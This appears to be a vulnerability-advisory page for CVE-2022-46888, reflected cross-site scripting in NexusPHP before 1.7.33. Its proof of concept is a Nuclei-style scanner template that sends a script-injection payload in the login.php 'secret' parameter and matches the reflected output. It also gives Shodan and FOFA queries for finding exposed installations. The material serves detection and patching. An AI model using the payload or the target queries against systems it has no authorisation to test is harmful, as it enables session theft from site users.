CVE-2022-46888: NexusPHP <1.7.33 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: NexusPHP | POC: 已公开

漏洞描述

NexusPHP before 1.7.33 contains multiple cross-site scripting vulnerabilities via the secret parameter in /login.php; q parameter in /user-ban-log.php; query parameter in /log.php; text parameter in /moresmiles.php; q parameter in myhr.php; or id parameter in /viewrequests.php. An attacker can inject arbitrary web script or HTML, which can allow theft of cookie-based authentication credentials and launch of other attacks..

PoC代码[已公开]

id: CVE-2022-46888

info:
  name: NexusPHP <1.7.33 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    NexusPHP before 1.7.33 contains multiple cross-site scripting vulnerabilities via the secret parameter in /login.php; q parameter in /user-ban-log.php; query parameter in /log.php; text parameter in /moresmiles.php; q parameter in myhr.php; or id parameter in /viewrequests.php. An attacker can inject arbitrary web script or HTML, which can allow theft of cookie-based authentication credentials and launch of other attacks..
  remediation: |
    Upgrade to NexusPHP version 1.7.33 or later to mitigate this vulnerability.
  reference:
    - https://www.surecloud.com/resources/blog/nexusphp-surecloud-security-review-identifies-authenticated-unauthenticated-vulnerabilities
    - https://github.com/xiaomlove/nexusphp/releases/tag/v1.7.33
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46888
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-46888
    cwe-id: CWE-79
    epss-score: 0.14552
    epss-percentile: 0.94232
    cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nexusphp
    product: nexusphp
    shodan-query:
      - http.favicon.hash:-582931176
      - cpe:"cpe:2.3:a:nexusphp:nexusphp"
    fofa-query: icon_hash=-582931176
  tags: cve,cve2022,nexus,php,nexusphp,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/login.php?secret="><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value=""><script>alert(document.domain)</script>">'
          - 'NexusPHP'
        case-insensitive: true
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100dc3599dc5daceaf5e5fa433b8bd437a52cfc873256d5cf628098d52b4f3c14f2022100f2f1fdaf6b96ab4476228d6517057b8efdb186e770b587feed1966bf4f907536:922c64590222798bb761d5b6d8e72950

相关漏洞推荐